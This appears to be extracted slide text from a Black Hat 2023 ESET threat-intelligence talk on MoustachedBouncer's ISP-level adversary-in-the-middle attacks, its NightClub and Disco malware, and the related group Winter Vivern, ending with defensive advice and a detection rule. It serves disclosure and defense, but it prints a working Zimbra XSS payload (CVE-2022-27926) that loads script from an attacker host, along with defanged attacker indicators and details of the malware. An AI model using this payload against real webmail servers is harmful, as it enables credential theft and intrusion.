###### Black Hat USA – 2023-08-10

## MoustachedBouncer

###### AitM-powered surveillance via Belarus ISPs

 Matthieu Faou Senior Malware Researcher


-----

###### Matthieu Faou

 • Senior Malware Researcher

 • Investigating targeted attacks since 2016

 • RE / Threat hunting / CTI

 matthieu.faou@eset.com


-----

###### 1: MoustachedBouncer 2: AitM 3: NightClub 4: Winter Vivern 5: Defense

#### 1: MoustachedBouncer


-----

-----

-----

-----

-----

###### MoustachedBouncer in short


###### Initial Access

 AitM


###### Languages

 C++, Go and .NET


###### Command and
 Control
 SMTP/IMAP, DNS and SMB


###### Turla


-----

###### Attribution

 Russian speakers Belarus
 Surveillance of foreign
 diplomats in Belarus


###### Assessment: aligned with the interests of Belarus


-----

###### 1: MoustachedBouncer 2: AitM 3: NightClub 4: Winter Vivern 5: Defense

#### 2: Adversary-in-the-middle attacks


-----

-----

-----

-----

-----

#### How MoustachedBouncer uses AitM?


-----

```
updates.microsoft[.]com

```

-----

-----

-----

```
            msftconnecttest.com
 updates.microsoft[.]com
MicrosoftUpdate845255.exe

```

-----

```
         MicrosoftUpdate845255.exe
\\35.214.56[.]2\OfficeBroker\OfficeBroker.exe

```

-----

```
         MicrosoftUpdate845255.exe
\\35.214.56[.]2\OfficeBroker\OfficeBroker.exe

```

-----

```
 updates.microsoft[.]com
MicrosoftUpdate845255.exe

```

-----

#### AitM: compromised router or ISP?


-----

#### Residential IP addresses


-----

#### Deep Packet Inspection in Belarus


-----

-----

-----

-----

###### SORM


-----

#### Assessment: ISP level


-----

```
updates.microsoft[.]com

```
```
MicrosoftUpdate845255.exe

```

-----

###### Disco

# Go 2020 AitM


-----

-----

###### Linux machine

 Kali Linux


###### Execute

 Spying plugins


###### SMB shares

 Exfiltrate

 Collected data


-----

###### Plugins - SMB shares
```
    \\209.19.37[.]184\driverpack\aact.exe
    \\59.6.8[.]25\outlooksync\outlooksync.exe
    \\52.3.8[.]25\oracle\oracleTelemetry.exe
    \\globaltelemetry[.]org\info\driverconfigurator.exe
    \\facebooklogger[.]org\logs\logger.exe
    \\hotkeysstatus[.]com\statuses\checkme.exe

```

-----

###### Plugins - SMB shares
```
    \\209.19.37[.]184\driverpack\aact.exe
    \\59.6.8[.]25\outlooksync\outlooksync.exe
    \\52.3.8[.]25\oracle\oracleTelemetry.exe
    \\globaltelemetry[.]org\info\driverconfigurator.exe
    \\facebooklogger[.]org\logs\logger.exe
    \\hotkeysstatus[.]com\statuses\checkme.exe
  whois hotkeysstatus.com
  No match for domain

 117.61.84[.]5
  "HOTKEYSSTATUS.COM".

```

-----

###### LPE

 CVE-2021-1732


###### Take

 screenshots


###### PowerShell

 scripts


###### Plug-ins

 Recent file

 stealer


###### Reverse Proxy

 (revsocks)


-----

###### 1: MoustachedBouncer 2: AitM 3: NightClub 4: Winter Vivern 5: Defense

#### 3: NightClub


-----

###### NightClub

# C++ 2014 VPN


-----

###### ld k l f h l b


-----

###### f


-----

###### Capabilities


###### File stealer

 .doc, .docx, .xls and .pdf


###### C&C by emails

 SMTP CSmtp library


-----

-----

-----

-----

-----

### 2020-2022 variant


-----

###### Shared code

 with past versions


###### Orchestrator

 svhvost.exe


###### 2020-2022 variant

 Module agent

 schvost.exe


-----

```
%APPDATA%\Microsoft
  \def\Gfr45.cfg

```

###### Configuration

 RSA Hardcoded key


-----

```
"main":{
  "agent_name":"<filename of the module agent>",
  "server_name":"<filename of the orchestrator>",
  "auto_del": {
    "enabled":<true or false>,
    "days":<integer>
  }
},
"storage":{
  "path":"<path>",
  "max_size":<integer>,
  "stop at limit":<true or false>

```

-----

```
},
"transport":{
  "client_mail":"<email address>",
  "pass":"<password of the email address>",
  "control_mail":"<email address>",
  "smtp":"<domain>",
  "pop3":"<domain>",
  "server_port":<integer>,
  "use_ssl":<true or false>,
  "max_file_size":<integer>,
  "max_daily_traffic":<integer>
},

```

-----

```
  "max_daily_traffic":<integer>
},
"modules":[
  {
   "name":"<filename of the module>",
   "enabled":<true or false>,
   "max_size":<integer>,
   "file":"<filename of the output file>"
   //[Other fields depending on the module]
  }
]

```
```
}

```

-----

###### NightClub plugins

 INI

 Masquerade Export

 Start or Starts


###### JSON


-----

###### Plugins

 Audio recorder Screenshotter Keylogger DNS-tunneling


###### backdoor


-----

#### DNS-tunneling backdoor


-----

-----

###### Requests
```
xZW1wdHkx.11.1.1.cid

```

-----

###### Requests
```
xZW1wdHkx.11.1.1.cid

```

-----

###### Requests
```
xZW1wdHkx.11.1.1.cid
 empty

```

-----

###### Replies
```
xYzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQx.27.2.1.calc

```

-----

###### Replies
```
xYzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQx.27.2.1.calc
c:\windows\system32\calc.exe

```

-----

###### Replies
```
xYzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQx.27.2.1.calc
                       Command ID
c:\windows\system32\calc.exe

```

-----

###### Replies
```
xYzpcd2luZG93c1xzeXN0ZW0zMlxjYWxjLmV4ZQx.27.2.1.calc
                       Command ID
c:\windows\system32\calc.exe
                            Command name
                             (useless)

```

-----

-----

-----

-----

-----

###### d l h f f f


-----

###### NightClub Registrar, Unique Winter Vivern C&C server hosting provider & pattern C&C servers
 network scanning


-----

###### 1: MoustachedBouncer 2: AitM 3: NightClub 4: Winter Vivern 5: Defense

#### 4: Winter Vivern


-----

-----

-----

-----

#### Typical compromise chain


-----

-----

-----

-----

-----

```
             tasklist
             whoami
             arp -a
             dir

```

-----

#### And some CVEs!


-----

```
 https://<victim’s Zimbra
 domain>/public/error.jsp?errCode=
 onload=if(!document.getElementById("x67xasd765")){w
 indow.x=document.createElement('script');window.x.i
 d="x67xasd765";
 window.x.src='https://oscp-avanguard[.]com/
 5026dbbkj2KJ21fr_[redacted]_Fas2/auth.js';
 document.body.appendChild(window.x);}>&accountName=
 <victim’s email address>

```

-----

###### CVE-2022-27926


-----

-----

-----

###### Winter Vivern


###### Government staff

 Europe and Asia


###### MoustachedBouncer

 Collaborator


###### Backdoor

 PowerShell


###### Phishing for credentials

 Zimbra


-----

###### 1: MoustachedBouncer 2: AitM 3: NightClub 4: Winter Vivern 5: Defense

#### 5: Defense


-----

###### Update

 Webmail / Internet facing
 services


###### SMB

 Deny to external


###### Defensive measures

 VPN

 To prevent AitM


-----

###### DNS-tunneling detection

 alert udp any any -> any 53 \

 (msg:"Possible beacon for MoustachedBouncer NightClub DNS-tunneling backdoor";\

 gid:45534554; sid:45375000; rev:1;\

 metadata: author "ESET Research", date "2022-10-21,\

 copyright "ESET Research"

 content:"|78 5a 57 31 77 64 48 6b 78 02 31 31 01 31 01 31 03 63 69 64|";offset:13;)
```
            xZW1wdHkx.11.1.1.cid

```

-----

###### AitM capabilities


###### Related to Winter Vivern


-----

###### AitM capabilities


###### Related to Belarus-aligned Winter Vivern


-----

###### AitM capabilities


###### Target foreign Related to Belarus-aligned diplomats in Belarus Winter Vivern


-----

###### AitM capabilities


###### Active since 2014


###### Target foreign Related to Belarus-aligned diplomats in Belarus Winter Vivern


-----

-----